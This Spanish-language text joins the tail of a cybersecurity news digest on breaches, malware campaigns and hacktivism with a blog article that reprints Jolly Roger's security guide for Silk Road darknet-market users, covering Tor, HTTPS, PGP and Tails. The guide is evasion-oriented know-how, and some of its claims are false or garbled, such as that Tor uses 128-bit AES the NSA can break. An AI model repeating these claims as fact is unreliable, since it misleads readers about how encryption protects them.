búsquedas en la plataforma de consulta de sentencias. Esta plataforma permitía buscar sentencias de forma rápida y anónima para proteger la identidad de los ciudadanos, pero el fallo ha dejado a la vista información que permite adivinar delitos y causas pendientes de cualquier ciudadano. - Ciberataque a la unión crediticia de Sheffield: Cerca de 15.000 miembros de la Sheffield Credit Union han sido víctimas de un robo de información personal después de que la institución haya sufrido un ciberataque. La información vulnerada durante este ataque, que se dio en febrero, contendría nombres, números de la seguridad social, direcciones y detalles bancarios de los clientes. - Fuga de información en Goodyear, Arizona: Los ciudadanos de Googyear, en el estado de Arizona, podrían haber sido víctimas de una fuga de información que afectaría a 30.000 de sus vecinos. Por el momento se desconoce el origen de la fuga, pero ésta afectaría a los usuarios de los servicios públicos de la ciudad. El ayuntamiento ha anunciado una investigación en profundidad, pero se sospecha que parte de la información sustraída serían los datos bancarios de los usuarios. - Nueva fuga de información que afecta a Facebook: Un informe ha revelado que la Universidad de Cambridge habría estado usando datos privados de Facebook obtenidos de una popular app de personalidades denominada myPersonality. Esta app habría sido descargada por cerca de 3 millones de usuarios cuyos datos privados – entre los que se incluyen las respuestas a preguntas de carácter íntimo – habrían sido expuestos y todavía hoy podrían ser accedidos por cualquier usuario. - Fuga de información en LocationSmart: La compañía estadounidense LocationSmart ha sido víctima de una fuga de información debido a un fallo en un componente de su página web. Según informa Brian Krebs, cualquier usuario podría utilizar este fallo para poder obtener información en tiempo real sobre la geolocalización de terminales móviles, sin necesidad de contraseña o autenticación. - Datos de millones de japoneses comprometidos: Se ha detectado una publicación en un foro con base en China en la que se pondrían a la venta varios millones de datos de usuarios japoneses. Los datos son una compilación de registros obtenidos de 50 páginas japonesas dedicadas a los sectores retail, restauración, entretenimiento, transporte y financiero. Los datos se estarían vendiendo por cerca de 150 dólares. - Fuga de datos en routers Comcast: Los clientes que dispongan de los routers Wireless Xfinity desarrollados por Comcast podrían haber sido víctimas de una fuga de información grave que afectaría a datos privados incluidas contraseñas. Esto se debe a que las cuentas de acceso de los usuarios de estos routers están sincronizadas con su número identificador y su dirección física, lo que a la larga permite conocer la contraseña del WiFi y el SSID. Comcast ya ha confirmado que está trabajando en un parche para mitigar esta fuga de información. - Subdominio de T-Mobile expone información confidencial: Un fallo en la privacidad del subdominio promotool.t-mobile.com de T-Mobile permitía acceder a los detalles de las cuentas de clientes. Este dominio, únicamente pensado para uso de empleados de T-Mobile, era fácilmente accesible desde diversos motores de búsqueda y contenía una API oculta que devolvía datos de clientes añadiendo únicamente el número de teléfono al final de la dirección web. Estos datos incluían el nombre completo, dirección postal, número de cuenta bancaria y, en algunos casos, el PIN utilizado como pregunta de seguridad. - Fuga de datos en sudáfrica:Medios sudafricanos han alertado de una fuga de información y datos privados que ha afectado a cerca de 934.000 personas en el país. Al parecer, la fuga procede de un sistema de pago online de multas de tráfico. Los datos expuestos incluyen números de identificación (DNIs), direcciones de correo electrónico, nombres y contraseñas en texto plano. ## Incidentes de seguridad - Impacto de la fuga de datos en los resultados de Equifax:Equifax ha publicado nueva información sobre el impacto de la fuga de datos revelada en septiembre de 2017 y, por primera vez, ha publicado toda la información sobre el tipo de datos afectados. La compañía ha admitido que la mitad de los ciudadanos estadounidenses vio como se sobreexponía sus direcciones físicas, fechas de nacimiento, números de la seguridad social, géneros, números de teléfono, carnés de conducir, números de tarjeta de crédito y de identificación fiscal. - EternalBlue: más usado en 2018 que durante el WannaCry: ESET ha publicado un artículo estudiando el uso del exploit EternalBlue un año después del WannaCry y ha detectado que éste estaría siendo explotado más a menudo ahora que en mayo de 2017. Se sospecha que este incremento en uso puede deberse a su incorporación al malware Satan, pero también señala que muchos usuarios aún no han logrado parchear sus sistemas. - Incidente informático en debate político:Un usuario del foro online que realizaba el streaming oficial del debate del Congreso de California logró hackear e interrumpir la emisión del debate para sustituirla con imágenes de alto contenido pornográfico. El moderador del debate informó del ataque y la conexión se recuperó minutos más tarde. ## Cibercrimen - Compañía rusa vende 0-Day de software hospitalario: La compañía moscovita Gleg estaría distribuyendo exploits para vulnerabilidades 0-Day que afectan a software médico usado principalmente en hospitales. Gleg vende cerca de 25 exploits relacionados con el mundo de la salud al año por un precio cercano a los 4.000 dólares. Algunos de estos exploits han podido ser utilizados para atacar y obtener los datos de la compañía MediTEX, que ha sufrido recientes intrusiones y ataques a través de ransomware. - Descubren cómo atacar dispositivos Android usando su GPU: Se ha detectado un nuevo tipo de ataque que se aprovecha de defectos físicos en la memoria de los dispositivos Android para burlar su seguridad. Este tipo de ataque, Rowhammer, se creía imposible de realizar hasta que un grupo de investigadores han desarrollado un exploit para ejecutar código malicioso en remoto a través de la GPU del móvil. El exploit se conoce como GLitch y permite cambiar contenido de partes individuales almacenadas en la RAM después de que el usuario haya visitado una web maliciosa cargada con un javascript. - Campaña de phishing valiéndose de la protección de datos: Ante la entrada en vigor de la nueva ley europea de protección de datos (GDPR) el próximo día 25, multitud de compañías están enviando correos a sus usuarios con información sobre ésta. Este hecho está siendo aprovechado por los atacantes que están enviando correos haciéndose pasar por empresas como Airbnb para confirmar las credenciales e introducir los números de cuenta bancaria. - Esconden puertas traseras en paquete JavaScript: El equipo responsable del paquete JavaScript Node Package Manager (npm) ha detectado que un atacante habría escondido puertas traseras en su código. La puerta trasera se detectó en el paquete “getcookies”, un paquete de reciente incorporación a la librería JavaScript que sirve para trabajar con las cookies del navegador. Esta puerta se instalaría en cualquier app que incorporara esta librería. - Campañas de ransomware Iron y Cobalt Strike : Se ha detectado una serie de campañas maliciosas en las que uno o varios grupos de atacantes, probablemente de origen chino, están usando PowerShell y scripts de Shell para atacar máquinas a través de diferentes técnicas: el ransomware Iron, mineros de criptomoneda y herramientas de acceso persistente como Cobalt Strike. Estas campañas afectan a dispositivos Windows y Linux y utilizan mecanismos para lograr el movimiento lateral a través de una red. - Campañas de robo de criptomoneda en Drupal:Días después de que se conocieran las últimas vulnerabilidades críticas que afectan al software Drupal, se ha detectado una campaña activa de infección de malware que busca robar y minar criptomonedas. Se estima que cerca de 350 sitios con software Drupal habrían sido ya atacados con puertas traseras y mineros, estando entre estos los sitios web de varias agencias gubernamentales de EE.UU. y Turquía o la Universidad de Aleppo, en Siria. Además, se ha detectado una campaña de difusión del malware Kitty que afecta a estos mismos sitios. - El renacer de Armor, el antivirus falso para Android: El equipo de MalwareBytes ha detectado una nueva aplicación denominada Android’s Antivirus que se trataría de una copia de la app Armor Android AV, un antivirus falso que se hizo muy popular en 2013 y cuyo uso había decaído considerablemente. Este supuesto antivirus fingía proteger los dispositivos al tiempo que infectaba los terminales de miles de dispositivos con anuncios y peticiones de descarga de aplicaciones de pago. - La Nueve de Anon amenaza a los anunciantes de Forocoches: La facción más notable de Anonymous en España, La Nueve de Anonymous, publicó ayer un tuit en el que se intuye un posible ataque contra los anunciantes de Forocoches.com. Este foro es el que más usuarios tiene en España y en los últimos días ha saltado a los titulares después de que varios usuarios compartieran datos personales de la víctima del conocido caso de La Manada. Se especula que la amenaza de La 9 puede estar dirigida contra algunos de sus anunciantes con más relación con el foro, como Telepizza o Hawkers. - Defacement a cámaras Canon en Japón:Un grupo de hackers ha logrado realizar defacements en decenas de cámaras de la marca Canon por toda la geografía japonesa. El ataque fue descubierto a principios de mayo, pero se sospecha que comenzó a mediados de abril. Tras el defacement, las cámaras de seguridad seguían mostrando imágenes, pero iban acompañadas por el mensaje “I’m hacked. Bye2”. Para su ataque, los hackers se aprovecharon de que las cámaras aún usaban las contraseñas por defecto del fabricante. - Ataque al sistema de bicicletas públicas de Copenhague:El sistema de administración y control de la red de bicicletas municipales de la ciudad de Copenhague, Bycyklen ha sido víctima de un ataque que ha afectado a todo el servicio, dejando cerca de 2.000 bicicletas inutilizables. Durante el ataque, todas las bases de datos del sistema fueron eliminadas. - Rowhammer se activaría solo con el envío de paquetes a través de una LAN: Se ha publicado una nueva variante de los ataques tipo Rowhammer que permitiría su explotación remota. En este caso, para lanzar el ataque (que podría llegar a permitir la ejecución de código) sería suficiente con enviar tráfico de red (en redes de al menos 10Gbps) contra un equipo remoto. Los atacantes han realizado una prueba de concepto contra un servidor memcahed. No obstante, la explotación es compleja. - Google Maps permite redirecciones a sitios maliciosos: Sophos ha identificado un nuevo vector de ataque que afecta a Google Maps en su versión maps.app.goo.gl. Según los investigadores, este servicio incluiría una vulnerabilidad que podría ser explotada por cibercriminales para redirigir a los usuarios a sitios maliciosos y campañas de phishing. Esto sería posible a través de direcciones acortadas y compartidas en la plataforma, ya que el motor de Google no las identifica como maliciosas y no es capaz de eliminarlas. - Hackeando trenes de pasajeros: Un estudio realizado en las redes inalámbricas de varios trenes de pasajeros ha encontrado varios fallos en éstas que podrían propiciar que un grupo de atacantes se hiciera con el control de los trenes. Entre los fallos más corrientes se encuentran el uso de contraseñas por defecto y la falta de separación entre redes de usuarios, de uso interno y de control del tráfico. - La 9 ataca Acciona: En la tarde de ayer, el grupo hacktivista La9deanon ha publicado diversos tweets en los que anunciaban de una inminente acción relacionada hacia una compañía del IBEX35. Minutos después el perfil del grupo hizo público que habían vulnerado los sistemas logísticos del grupo Acciona, concretamente los que afectan a aquellos servicios que ofrecen a terceros a través de la extranet de la compañía. Entre las empresas cliente afectadas se puede observar el Grupo Leche Pascual y CSM Bakery Solutions. - Un ciberatraco millonario golpea a varios bancos mexicanos: Un grupo de hackers han robado sustraído entre 300 y 400 millones de pesos mexicanos (de 15 a 20 millones de dólares) por medio de los sistemas de banca en línea de instituciones como Banorte —el segundo banco más grande del país— y Banco del Bajío. El robo habría ocurrido el último fin de semana de abril, lo que obligó a una reestructuración del Sistema de Pagos Electrónicos Interbancarios (SPEI), operado por el Banco de México. Esto, a su vez, ha ralentizado todas las operaciones bancarias de dicho país durante las últimas semanas. - Nethammer: explotación remota de ataques Rowhammer: Un grupo de investigadores independiente de los descubridores de Throwhammer ha publicado un ataque muy similar al que han bautizado como Nethammer. Rowhammer explota errores en DRAM para modificar el contenido de una celda de memoria sin acceder a ella. En su lugar, se accede a otras ubicaciones de memoria a una frecuencia alta. Según los investigadores, Nethammer es el primer ataque remoto de Rowhammer que, sin una sola línea de código controlada por el atacante en el sistema objetivo, pueden afectar a sistemas que usan memoria no cacheada o instrucciones flush para tratar peticiones de red para, por ejemplo, la interacción con el dispositivo de red. - Ataque mundial a impresoras Ricoh: Durante el día de ayer el investigador de seguridad ruso Ankit Anubhav alertó de que alguien había vulnerado la seguridad de cerca de 180 impresoras de la marca Ricoh a través de uno de sus puertos conectados a Internet, probablemente el 137. Al parecer los atacantes habrían lanzado un escaneo mundial a través de Shodan para acceder a las impresoras y cambiar los nombres de la NetBiOS escribiendo “PRINTER-HACKED” en su lugar. - **Intrusión en Securus **: Un hacker desconocido habría sido capaz de penetrar en los servidores de la compañía Securus. Esta compañía es famosa por ser la encargada de proveer a los cuerpos de seguridad de EE.UU. de la tecnología para realizar seguimientos a cualquier teléfono móvil del país. Entre las pruebas aportadas por el hacker para demostrar su ataque, se encontraban números de usuarios y miles de contraseñas poco seguras. - Malware PoS afecta a restaurantes Chili: Los usuarios de los restaurantes Chili pueden haber sido víctima de un ataque que habría logrado acceder a su número de tarjeta de crédito o débito. Este ataque se habría producido por obra de un malware que también habría logrado acceder a otros datos privados de los clientes, pero no a sus datos de la seguridad social o de identificación federal. El case se encuentra todavía bajo investigación. - Anunciados nuevos ataques en la #OpCatalunya: El grupo hacktivista Anonymous_opt ha publicado una serie de tweets en su perfil de Twitter en los que amenaza con nuevos ataques en contra del gobierno de España por la no retirada del articulo 155. Aún se desconocen los detalles de esta nueva fase de la #OpCatalunya. - Wicked, otra nueva variante de Mirai:Fortinet Labs ha identificado una nueva variante del bot Mirai, Wicked. A diferencia del malware original de Mirai, que usaba técnicas de fuerza bruta basadas en listas de credenciales predefinidas para tratar de vulnerar los dispositivos IoT, Wicked explora la red al intentar abrir un socket en los puertos 8080, 8443, 80 y 81 a las direcciones IP de dispositivos IoT potencialmente vulnerables. Si la conexión es exitosa, el malware intenta explotar vulnerabilidades conocidas de los dispositivos IoT (listadas en la fuente) con una serie de exploits públicos para descargar su carga maliciosa en el sistema remoto. - Biñeros: fraude a los sistemas financieros en América Latina:Un grupo de cibercriminales latinoamericanos estaría aprovechándose de errores en el sistema de validación de los números de identificación bancaria (BINs) para generar números falsos de pagos con tarjeta de crédito. Una vez creados los identificadores de pago falsos, los atacantes usan tarjetas falsas para completar las transacciones. Para la creación de los números, los viñeros (como se conoce a estos criminales), se aprovechan de un fallo en los bancos que permite validar una tarjeta, aunque esta sea falsa. - Botnet Satori busca mineros de Ethereum expuestos:Los operadores de la botnet Satori estarían escaneando la red en busca de mineros de criptomoneda expuestos. Los criminales buscan aquellos mineros que tienen los puertos 3333 abiertos, ya que este puerto permite la gestión remota en muchos dispositivos construidos para minar Ethereum. Estos mismos atacantes habrían probado ya a realizar escaneos tras comprometer miles de routers GPON desde IPs situadas en México. - Script de PHP infecta 2.400 páginas en una semana:Un grupo de atacantes habría conseguido realizar una serie ataques en páginas a través de un script denominado Brain Food que estaría siendo difundido a través de la botnet homónima. Cerca de 5.000 páginas habrían sido comprometidas en el último mes, con casi la mitad de las infecciones teniendo lugar en la última semana. El script está configurado con múltiples capas de defensas para evitar ser detectado y poder inyectar código que genere redirecciones automáticas. - Investigación de fuga de información en Tidal: El servicio de streaming de música Tidal ha anunciado que ha sufrido una fuga de información. Dicha fuga, a su vez, derivó en las sospechas de que la compañía podría estar inflando sus cuentas y retrasándose en los pagos de derechos de autor. La fuga de información continua bajo investigación y podría derivar en más problemas para la empresa. - Nuevo método para instalar puertas traseras en sitios Wordpress: Se ha detectado un nuevo método de instalación de plugins que sirven como puertas traseras en las páginas web que utilicen WordPress CMS. La técnica de instalación es bastante compleja y solo sirve para aquellas cuentas de Wordpress que estén indebidamente protegidas y requiere el uso del plugin Jetpack. Esto no ha impedido que se haya detectada una campaña de uso activo del nuevo método desde el 16/05. - Nuevo ataque de los responsables de Triton: Xenotime, el grupo criminal que llevó a cabo un ataque contra una planta petroquímica en Arabia Saudí a través del malware Triton, ha sido detectado ampliando su espectro de ataques. Así lo asegura Dragos, la compañía que junto a FireEye detectó el malware por primera vez en noviembre. Al parecer en sus ataques actuales, el grupo habría empezado a usar otros tipos de malware que no están limitados a la tecnología que usaba Triton. - La Nueve anuncia nuevos ataques a partir del día 26/05: El perfil de carácter hacktivista La Nueve ha publicado una entrada en su perfil de la red social Twitter, en el que informa que estarían apoyando al conocido rapero Valtonyc, el cual debe ingresar en prisión por varios delitos relacionados con sus letras. Además de mostrar su apoyo al rapero, la publicación advierte a las empresas, estados, autonomías y otras entidades que aseguren sus bases de datos, ya que a partir del 26 de mayo se proponen realizar ataques contra sus activos. - Nuevo phishing en WhatsApp: Se ha detectado un nuevo phishing que se está difundiendo por correo electrónico y mensajes de WhatsApp que se hace pasar por la compañía de esta aplicación de mensajería. El phishing informa a los usuarios de que su cuenta está a punto de caducar y que deben entrar en un enlace malicioso antes de 24 horas. Una vez los usuarios acceden al enlace malicioso, éste pide información de la tarjeta de crédito del usuario. ## Ciberguerra - Las autoridades chinas admiten el espionaje en WeChat: Autoridades estatales chinas han admitido por error que son capaces de acceder a los mensajes eliminados de la aplicación de mensajería WeChat. Durante el pasado fin de semana, la comisión regional de vigilancia de la provincia de Anhui publicó un mensaje asegurando que se encontraban en plena investigación de unos mensajes de borrados por un sospechoso. Pese a que la publicación fue borrada en cuestión de minutos, esta deja entrever que la policía china colabora con el desarrollador Tencent para instalar puertas traseras que permiten el espionaje a ciudadanos chinos. - Ataques de Fancy Bear a través de Lojack: Investigadores de ASERT han descubierto servidores Command & Control escondidos en Lojack, y han atribuido los mismos a grupos de espionaje rusos, principalmente Fancy Bear (APT28). El uso de Lojack es novedoso ya que se trata de una aplicación legítima utilizada por muchas empresas para proteger sus activos cuando estos han sido robados. Aún se desconoce cuál habría sido el vector de ataque inicial para explotar Lojack. - Rusia bloquea 50 servicios de VPN y proxies: Las autoridades rusas han tomado la decisión en los últimos días de bloquear 50 servicios VPN y proxies que estarían siendo utilizados por los usuarios de Telegram para seguir usando la aplicación de mensajería. Esta decisión, ejecutada a través del órgano Roskomnadzor, está en línea con la guerra declarada por el gobierno ruso contra Telegram por no proporcionarle acceso a sus servidores. Anteriormente, la página del Roskomnadzor había sido objetivo de ataques DDoS para protestar la decisión de las autoridades rusas. - Burning Umbrella : Un nuevo informe de inteligencia publicado en los últimos días ha ofrecido más información sobre el grupo cibercriminal Winnti Umbrella y sus posibles lazos con el gobierno chino. Según los investigadores, los grupos cibercriminales chinos y Winnti Umbrella compartirían objetivos y recursos para atacar organizaciones en Corea del Sur, EE.UU. o Japón. Los ataques de este grupo estarían basados en spear phishing combinados con el robo del código de firma de certificados. - Ataque de Anonymous contra institución rusa: Continúa la guerra entre el gobierno ruso y los simpatizantes de Telegram. Tras el ataque de denegación de servicio contra el órgano regulador de las comunicaciones, Roskomnadzor, los miembros de Anonymous han atacado ahora la página de la Agencia Federal rusa para la Cooperación Internacional, Rossotrudnichestvo. - Grupo de ciberespionaje gubernamental comprometido: Semanas después de que Kaspersky hiciera pública su investigación sobre el grupo ZooPark, uno o varios atacantes habrían realizado un ataque con éxito contra dicho grupo. ZooPark, especializado en ataques a dispositivos Android por todo Oriente Medio, ha sido víctima de un robo de información que ha incluido mensajes de texto, correos electrónicos, localizaciones GPS, grabaciones de audio e información de servidores localizados en Teherán, Irán. - El FBI toma el control de la botnet Rusa VPN Filter:Agentes del FBI han logrado hacerse con el control de uno de los servidores clave utilizados por la botnet que estaría utilizándose para lanzar el ataque VPN Filter. Se sospecha que esta botnet estaba siendo utilizada por la APT 28 Fancy Bear, grupo con lazos directos con el Kremlin. ## Interes - Descenso de denuncias por ransomware: El FBI ha hecho públicos los datos de un informe con los datos de las denuncias recibidas por ransomware en EE.UU. Según el departamento federal, se realizaron cerca de 1.000 denuncias menos en 2017 en comparación con 2016. Se sospecha que uno de los motivos de este descenso es la decisión de las empresas de aplicar actualizaciones con más rapidez tras la crisis de WannaCry. - Amazon vende tecnología de reconocimiento facial: Durante las últimas horas del día de ayer se conoció la existencia de un servicio desarrollado por Amazon Web Services denominado “Amazon Rekognition”. Este servicio se trataría de un software de reconocimiento facial que estaría siendo vendido a empresas asociadas a cuerpos de seguridad estadounidenses. Esto ha provocado una sensación de alarma entre muchos usuarios que sospechan que esta técnica podría suponer una vulneración de su privacidad, al incorporar imágenes de cámaras de tráfico y otros servicios. --- # La "Biblia" de la Ciberseguridad URL: https://ciberseguridad.blog/la-biblia-de-la-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-05-16 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > Guía de seguridad de Jolly Roger para principiantes de la DarkNet , conceptos básicos de Cibersiguridad, TOR, VPN, Bitcoins y muchos más. ! DESCÚBRELO ¡ Hoy os traigo una impresionante guia descubierta en DeepDotWeb.com hecha por Jolly Roger y cuyo titulo marca "Guía de seguridad de Jolly Roger para principiantes" y creada para los usuarios de Silk Road. Una guia que nos dará los principios de seguridad que todo apasionado de la ciberseguridad debería conocer. Espero que la disfrutéis tanto como yo lo he hecho. Debido a la extensión del Post, os dejo un pequeño índice, más manejable: - Introducción a la comunicación segura - TOR, HTTPS, SSL - Cómo usar PGP - Usar PGP en TAILS - Encriptación completa del disco duro y sus archivos - Vulnerabilidades JavaScript y Eliminación de Metadatos personales desde archivos - Precauciones generales de seguridad al publicar online, aprender de los errores de otros - Datos EXIF - Necesito un abogado, captura e interrogatorio - Combinando TOR con una VPN - Montando una TOR sobre una VPN - Conexión TOR -> VPN para usuarios Windows - Cookies de rastreo - Aprendiendo de los errores de los otros. LIBERTAS, DPR, SABU, LULZSEC SABU se convirtió en hermano de Jeremy, informante del FBI - Donde podrías dirigirte si no tienes otra opción - Asegurar tu cuenta de la monitorización del FBI - Mentalidad de invencibilidas, tacticas de intimidación del gobierno - Cómo conectarse a TOR en la parte superior - Cómo verificar que tus archivos descargados son auténticos Verificar los mensajes firmados y firmar los mensajes propios - ¡Un ejemplo realmente malo de OpSec - Smarten Up! - TOR Chat - Obtención, envio y receción de Bitcoins de forma anónima - Clearnet VS Hidden Services : ¿Por qué debemos tener cuidado? - Te están observando - Virus, Malware, Vulnerabilidades - Monitoriza con una antena - Cookies y Javascript, más cookies de Flash y otros seguimientos del navegador Cookies Administrar la privacidad de Adobe Flash. Javascript - Algunas recomendaciones de ciberseguridad - Ataques de arranque frío, extracción de RAM no conectada - La fuerza de la criptografía y el anonimato cuando se utiliza correctamente - Direcciones de correo electrónico PGP / GPG Bajo ninguna circunstancia asocies una dirección en claro con tu clave PGP/GPG. Otro correo electrónico de estafa, cuidado - Una introducción a MD5 Plus y SHA-1 - Cosas obvias cuando estas usando TOR - ¿Estás usando safe-mail.net? - Otro ejemplo de cómo la criptografía robusta puede proteger a cualquiera - Escondiendote de tu ISP - Puentes y transporte Qué son los Bridges y cuándo usarlos - Capacidades de la NSA - Por qué siempre debemos respaldar las transmisiones - Hablemos de seguridad Simplicidad en Ciberseguridad Confiabilidad en Ciberseguridad La ejecución mínima del código que no es de confianza Aislamiento en Ciberseguridad Cifrado en Ciberseguridad Comportamiento seguro en Ciberseguridad - Configuración segura en Ciberseguridad ## Introducción a la comunicación segura - TOR, HTTPS, SSL Si estás leyendo esto, probablemente seas un usuario de la DarkNet o simplemente un friki de la ciberseguridad, ya que son terminos poco usados en otros ámbitos. Tor proporciona un grado de anonimato utilizando un AES de 128 bits (Estándar de cifrado avanzado). Se ha debatido si la NSA puede descifrar este código, y la respuesta es sí. Por eso, nunca debes enviar nada por Tor que no te resulte cómodo compartir con todo el mundo a menos que estés utilizando algún tipo de cifrado PGP del que hablaremos más adelante. La comunicación desde el ordenador a Internet depende de un nodo de entrada que, básicamente, "ingresa el ordenador" a la red Tor. Este nodo de entrada se comunica con el ordenador, y dicho nodo de entrada conoce la dirección IP. El nodo de entrada pasa la solicitud cifrada al nodo de retransmisión. El nodo de retransmisión se comunica con el nodo de entrada y el nodo de salida, pero no conoce la dirección IP de el ordenador. El nodo de salida es donde la solicitud se descifra y se envía a Internet. El nodo de salida no conoce la IP de el ordenador, solo la IP del nodo de retransmisión. El uso de este modelo de 3 nodos hace que sea más difícil, pero no imposible, correlacionar la solicitud con la dirección IP original. [Imagen: Red-Tor] El problema surge obviamente cuando se ingresa texto sin formato en TOR porque cualquiera puede configurar un nodo de salida. El FBI puede configurar un nodo de salida, la NSA o cualquier otro gobierno extranjero, o cualquier persona malintencionada que desee robar información. No debes ingresar datos confidenciales en ningún sitio web, especialmente al acceder a ellos a través de TOR. Si alguno de los nodos de la cadena está en peligro, o algunos lo están, y las personas que están a cargo de esos nodos comprometidos tienen la capacidad de descifrar la solicitud, es mejor que no haya nada delicado. Entonces, ¿qué podemos hacer para arreglar esto? Afortunadamente ahora tenemos más y más servidores que ofrecen algo llamado Servicios ocultos. Se puede reconocer fácilmente estos servicios por la dirección .onion . Estos servicios ofrecen lo que se llama cifrado de extremo a extremo. Lo que hace es quitarle el poder a los nodos de salida comprometidos y volver a ponerlos en sus manos. El servidor web del servicio oculto ahora se convierte en el nodo de salida, lo que significa que el sitio web que está visitando es el que descifra el mensaje, no un nodo de salida aleatorio ejecutado por un atacante potencial. Debemos recordar, el nodo de salida tiene la clave para descifrar la solicitud. El nodo de salida puede ver lo que se está enviando en texto claro una vez que lo descifran. Por ello, si estamos ingresando el nombre y la dirección en un campo, el nodo de salida tendría nuestra información. Si estamos colocando una tarjeta de crédito, una cuenta bancaria, nuestro nombre real, incluso nuestra información de inicio de sesión, estamos comprometiendo nuestra identidad. Otro paso que podemos dar, es visitar sitios web que usan algo llamado HTTP Secure. Podemos saber si el sitio web que se está visitando utiliza HTTP Secure con el prefijo al comienzo de la dirección. Si vemos https://, entonces el sitio web está utilizando HTTP Secure. Lo que hace es encriptar las solicitudes para que solo el servidor pueda descifrarlas, y que nadie "escuche" nuestra comunicación, como un nodo de salida Tor comprometido. Esta es otra forma de encriptación de extremo a extremo. Si alguien interceptara la solicitud a través de HTTP Secure, verían datos encriptados y tendrían que trabajar para descifrarlos. Otra razón por la que debes usar HTTPS siempre que sea posible es que los nodos maliciosos Tor pueden dañar o alterar los contenidos que pasan a través de ellos de manera insegura e inyectar malware en la conexión. Esto es más fácil cuando se envian solicitudes en texto plano, pero HTTPS reduce esta posibilidad. Sin embargo, debes saber que HTTPS también puede estar agrietado en función del nivel de la clave utilizada para encriptarlo. Cuando visitas un sitio web usando HTTPS, estás encriptando tu solicitud usando su clave pública y la están descifrando usando la clave privada. Así es como funciona la criptografía. Se proporciona una clave pública a quienes desean enviar un mensaje cifrado y el único que puede descifrar es el que tiene la clave privada. Desafortunadamente, muchos sitios web de hoy todavía usan claves privadas de solo 1.024 bits de longitud, algo que hoy en día ya no es suficiente. Por lo tanto, debemos asegurarnos de averiguar qué nivel de cifrado utiliza el sitio web que estamos visitando, para asegurarnos de que estamos utilizando como mínimo 2.048, o como recomendación 4.096 bits. Incluso hacer todo esto desafortunadamente no es suficiente, porque tenemos otro problema. ¿Qué sucede si el servidor web se ha visto comprometido? Quizás nuestros nodos TOR estén limpios, tal vez hayamos utilizado HTTPS para todas las solicitudes, pero el servidor web del sitio que estamos visitando, ha podido verse comprometido. ## Cómo usar PGP Otro paso que deberíamos seguir, especialmente cuando nos comunica con otros usuarios de Silk Road es mediante el cifrado PGP. Esto no siempre es posible, como en los casos en los que se inicia sesión en un sitio web, se completa un formulario, se inicia una sesión en el correo electrónico, etc. Debemos considerar que cualquier tipo de información que se ingrese en un sitio web utilizando texto sin formato, posiblemente se vea comprometido. Nunca debemos poner ningún dato sensible, es cualquier tipo de formato de texto sin formato. PGP entra en juego porque usa un método de encriptación muy fuerte llamado criptografía. PGP significa Pretty Good Privacy , y se utiliza para encriptar, descifrar y firmar textos, correos electrónicos, archivos, directorios y particiones de discos completos y para aumentar la seguridad de las comunicaciones por correo electrónico. Para los usuarios más técnicos, PGP utiliza una combinación en serie de hash, compresión de datos, criptografía de clave simétrica y finalmente criptografía de clave pública. Para los usuarios menos técnicos, el proceso de cifrado de mensajes mediante PGP es el siguiente: Se crea una clave privada y una clave pública. La clave pública es la clave que se les da a las personas que desean que se les envíen mensajes encriptados. La clave privada la guarda de forma privada. Esta clave privada es la única clave que puede descifrar mensajes que anteriormente estaban cifrados con nuestra clave pública. Si todavía estás conmigo, me alegro de no haberte perdido todavía. Esto se llama criptografía y fue diseñado para que cualquiera que intercepte nuestro mensaje no pueda descifrar el mensaje sin la clave privada. Incluso si nosotros mismoz, perdemos la clave privada, no hay un método de recuperación de clave. Puediendo considerar dicho mensaje cifrado de por vida. Entonces, ¿cómo usasmos PGP? Antes de llegar a eso, deberíamos conocere un sistema operativo live , que hace que el uso del cifrado y descifrado PGP sea muy fácil. Un sistema operativo live es un sistema operativo que puede ejecutarse sobre un sistema operativo actual. Por ejemplo, si somos un usuario de Windows, tenemos 2 opciones. Podemos descargar el sistema operativo live, grabarlo en un CD o DVD y luego iniciar el ordenador desde ese DVD o CD. Esto asegurará que el ordenador funcione como si tuviera este sistema operativo instalado en el ordenador. Sin embargo, si quitamos el CD o DVD y reiniciamos, el ordenador arrancará normalmente. También puede usar una unidad USB para realizar esta misma función. En segundo lugar, podemos ejecutar este sistema operativo live en lo que se llama una maquina virtual. Los beneficios de esto son que podemos ejecutar Windows simultáneamente mientras ejecutamos este otro sistema operativo y podemos cambiar fácilmente de uno a otro sin reiniciar el ordenador. Ambos métodos tienen sus pros y sus contras. Las ventajas de ejecutar un arranque de live CD son, que reducen el riesgo de que el ordenador se vea comprometida por virus, malware y keyloggers que dependen de las vulnerabilidades de Windows para ejecutarse. [Imagen: Sistema Operativo Tails] La razón por la que elijo Tails es porque ya tiene instaladas muchas de las características de seguridad que necesitamos para mantener el anonimato. Algunos usuarios no están contentos con Tails, pero realmente es un gran sistema operativo cargado con funciones de seguridad. Muchos de los que hablaremos en esta serie sobre seguridad. Hay muchos tutoriales sobre cómo cargar Tails en Virtual Box, así que no entraremos en muchos detalles, asegúrate de ejecutar Virtual Box y Tails desde una unidad USB o tarjeta SD. Sugeriría un dispositivo USB, pero por razones que explicaré más adelante. Pero básicamente cuando Virtual Box se ejecuta directamente en el disco duro, crea un disco duro virtual que se utiliza como un disco duro temporal mientras Tails se está ejecutando. Una vez que se cierra Tails, esta unidad virtual se eliminará, pero no se elimina permanentemente. Como sabemos por el poder de las herramientas de recuperación y el analisis forense, los archivos eliminados son fácilmente recuperables con las herramientas adecuadas. Por ahora, simplemente manten la máquina virtual y las colas desactivadas del disco duro y cárgualo en una unidad USB o en una tarjeta SD. Lo mismo ocurre cuando se inicia el ordenador directamente en Tails desde un DVD o dispositivo USB. El disco duro se usará para almacenar los archivos utilizados por Tails, así que asegúrate de que los archivos guardados o accedidos usando Tails se realicen desde un dispositivo USB o tarjeta SD, de lo contrario serán recuperables. La mejor opción es usar una Máquina Virtual y ejecutar todo en una memoria USB. Mantén fuera del disco duro real todo cuanto sea posible. Es posible triturar archivos para que sean inrecuperables, pero es mucho más fácil hacerlo en una unidad flash de 16 gb, que en un disco duro de 1 TB. ## Usar PGP en TAILS Bien, ahora supongamos que tenemos Tails funcionando. Vamos a aprender cómo usar PGP dentro de Tails. Lo primero que debemos hacer es crear nuestra propia clave personal, que consiste en la clave pública que se puede entregar a las personas o publicar en sus perfiles onlínea. Como se mencionó anteriormente, esta es la clave que las personas utilizan para cifrar los mensajes que se les envían. La clave personal también consiste en la clave privada que puede usar para descifrar los mensajes cifrados con la clave pública de PGP. A continuación y una vez creada, debemos guardar la clave privada en una unidad USB secundaria o tarjeta SD. Si está ejecutando Tails desde una unidad USB, debe usar una unidad independiente para almacenar la clave. Nuevamente, nunca almacene las llaves 